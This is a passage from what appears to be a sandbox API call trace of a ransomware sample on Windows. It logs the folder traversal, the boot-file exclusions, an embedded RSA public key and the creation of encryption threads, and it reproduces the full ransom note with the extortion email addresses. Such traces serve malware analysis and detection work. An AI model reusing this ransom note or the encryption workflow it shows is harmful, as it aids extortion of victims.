(pszPath="C:\\Users\\Default\\Contacts") returned="Contacts" [0259.154] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Contacts" | out: lpString1="Contacts") returned="Contacts" [0259.154] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0259.154] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0259.154] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Cookies" | out: lpString1="C:\\Users\\Default\\Cookies") returned="C:\\Users\\Default\\Cookies" [0259.154] SetErrorMode (uMode=0x1) returned 0x1 [0259.154] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Cookies" | out: lpString1="C:\\Users\\Default\\Cookies") returned="C:\\Users\\Default\\Cookies" [0259.154] lstrcatW (in: lpString1="C:\\Users\\Default\\Cookies", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Cookies\\") returned="C:\\Users\\Default\\Cookies\\" [0259.154] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Cookies\\" | out: lpString1="C:\\Users\\Default\\Cookies\\") returned="C:\\Users\\Default\\Cookies\\" [0259.154] lstrcatW (in: lpString1="C:\\Users\\Default\\Cookies\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Cookies\\*.*") returned="C:\\Users\\Default\\Cookies\\*.*" [0259.154] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Cookies\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0259.154] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0259.154] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Cookies" | out: lpString1="C:\\Users\\Default\\Cookies") returned="C:\\Users\\Default\\Cookies" [0259.154] lstrcatW (in: lpString1="C:\\Users\\Default\\Cookies", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Cookies\\*.*") returned="C:\\Users\\Default\\Cookies\\*.*" [0259.154] StrStrW (lpFirst="C:\\Users\\Default\\Cookies\\", lpSrch="Desktop") returned 0x0 [0259.154] StrStrW (lpFirst="C:\\Users\\Default\\Cookies\\", lpSrch="DESKTOP") returned 0x0 [0259.154] SetErrorMode (uMode=0x1) returned 0x1 [0259.154] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Cookies\\_HELP_INSTRUCTION.TXT") returned 46 [0259.154] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0259.154] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0259.154] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x14e0) returned 0x0 [0259.154] RegQueryValueExW (in: hKey=0x14e0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43e47f0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43e47f0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0259.154] RegCloseKey (hKey=0x14e0) returned 0x0 [0259.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0259.155] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0259.155] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\cookies\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0259.155] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\cookies\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0259.155] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Cookies\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0259.155] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0259.155] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0259.155] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0259.155] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0259.155] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0259.155] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0259.155] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Desktop" | out: lpString1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0259.155] SetErrorMode (uMode=0x1) returned 0x1 [0259.155] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Desktop" | out: lpString1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0259.155] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Desktop\\") returned="C:\\Users\\Default\\Desktop\\" [0259.155] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Desktop\\" | out: lpString1="C:\\Users\\Default\\Desktop\\") returned="C:\\Users\\Default\\Desktop\\" [0259.155] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Desktop\\*.*") returned="C:\\Users\\Default\\Desktop\\*.*" [0259.155] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Desktop\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0259.155] PathFindFileNameW (pszPath="C:\\Users\\Default\\Desktop") returned="Desktop" [0259.155] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0259.155] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0259.155] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0259.155] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0259.155] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0259.155] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0259.155] StrStrW (lpFirst="C:\\Users\\Default\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0259.156] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0259.156] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0259.156] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0259.156] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Desktop" | out: lpString1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0259.156] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Desktop\\*.*") returned="C:\\Users\\Default\\Desktop\\*.*" [0259.156] StrStrW (lpFirst="C:\\Users\\Default\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0259.156] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Desktop\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0259.156] PathFindFileNameW (pszPath="C:\\Users\\Default\\Desktop") returned="Desktop" [0259.156] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0259.156] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0259.156] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0259.156] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0259.156] SetErrorMode (uMode=0x1) returned 0x1 [0259.156] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0259.156] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0259.156] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Documents\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0259.156] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Documents\\*.*") returned="C:\\Users\\Default\\Documents\\*.*" [0259.156] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0259.157] PathFindFileNameW (pszPath="C:\\Users\\Default\\Documents") returned="Documents" [0259.157] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0259.157] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0259.157] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0259.157] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0259.157] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0259.157] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0259.157] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="Desktop") returned 0x0 [0259.157] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0259.157] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Documents\\") returned 31 [0259.157] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0259.157] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0259.157] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\") returned="\\\\?\\C:\\Users\\Default\\Documents\\" [0259.157] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x14ec [0259.157] Sleep (dwMilliseconds=0x96) [0259.308] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0259.308] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0259.308] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0259.309] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0259.309] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0259.309] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0259.309] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0259.309] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Documents\\*.*") returned="C:\\Users\\Default\\Documents\\*.*" [0259.309] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="Desktop") returned 0x0 [0259.309] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0259.309] SetErrorMode (uMode=0x1) returned 0x1 [0259.309] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Documents\\_HELP_INSTRUCTION.TXT") returned 48 [0259.309] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0259.310] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0259.310] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x14f0) returned 0x0 [0259.310] RegQueryValueExW (in: hKey=0x14f0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43e4a20, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43e4a20*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0259.310] RegCloseKey (hKey=0x14f0) returned 0x0 [0259.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0259.310] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0259.310] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0259.310] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0259.312] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0259.312] PathFindFileNameW (pszPath="C:\\Users\\Default\\Documents") returned="Documents" [0259.312] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0259.312] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0259.312] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0259.312] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\Default\\Documents\\My Music") returned="C:\\Users\\Default\\Documents\\My Music" [0259.312] SetErrorMode (uMode=0x1) returned 0x1 [0259.312] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents\\My Music" | out: lpString1="C:\\Users\\Default\\Documents\\My Music") returned="C:\\Users\\Default\\Documents\\My Music" [0259.312] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\") returned="C:\\Users\\Default\\Documents\\My Music\\" [0259.312] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Documents\\My Music\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\") returned="C:\\Users\\Default\\Documents\\My Music\\" [0259.312] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\*.*") returned="C:\\Users\\Default\\Documents\\My Music\\*.*" [0259.312] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0259.312] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0259.312] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents\\My Music" | out: lpString1="C:\\Users\\Default\\Documents\\My Music") returned="C:\\Users\\Default\\Documents\\My Music" [0259.312] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\*.*") returned="C:\\Users\\Default\\Documents\\My Music\\*.*" [0259.312] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Music\\", lpSrch="Desktop") returned 0x0 [0259.313] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Music\\", lpSrch="DESKTOP") returned 0x0 [0259.313] SetErrorMode (uMode=0x1) returned 0x1 [0259.313] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Documents\\My Music\\_HELP_INSTRUCTION.TXT") returned 57 [0259.313] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0259.313] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0259.313] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x14f4) returned 0x0 [0259.313] RegQueryValueExW (in: hKey=0x14f4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43e4c50, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43e4c50*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0259.313] RegCloseKey (hKey=0x14f4) returned 0x0 [0259.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0259.313] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0259.313] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\my music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0259.313] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\my music\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0259.313] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0259.313] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0259.313] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0259.313] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0259.313] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0259.313] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0259.313] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0259.313] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures") returned="C:\\Users\\Default\\Documents\\My Pictures" [0259.313] SetErrorMode (uMode=0x1) returned 0x1 [0259.314] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents\\My Pictures" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures") returned="C:\\Users\\Default\\Documents\\My Pictures" [0259.314] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\") returned="C:\\Users\\Default\\Documents\\My Pictures\\" [0259.314] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Documents\\My Pictures\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\") returned="C:\\Users\\Default\\Documents\\My Pictures\\" [0259.314] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\*.*") returned="C:\\Users\\Default\\Documents\\My Pictures\\*.*" [0259.314] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0259.314] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0259.314] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents\\My Pictures" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures") returned="C:\\Users\\Default\\Documents\\My Pictures" [0259.314] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\*.*") returned="C:\\Users\\Default\\Documents\\My Pictures\\*.*" [0259.314] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Pictures\\", lpSrch="Desktop") returned 0x0 [0259.314] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Pictures\\", lpSrch="DESKTOP") returned 0x0 [0259.314] SetErrorMode (uMode=0x1) returned 0x1 [0259.314] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT") returned 60 [0259.314] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0259.314] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0259.314] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x14f4) returned 0x0 [0259.314] RegQueryValueExW (in: hKey=0x14f4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43e4e80, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43e4e80*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0259.314] RegCloseKey (hKey=0x14f4) returned 0x0 [0259.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID 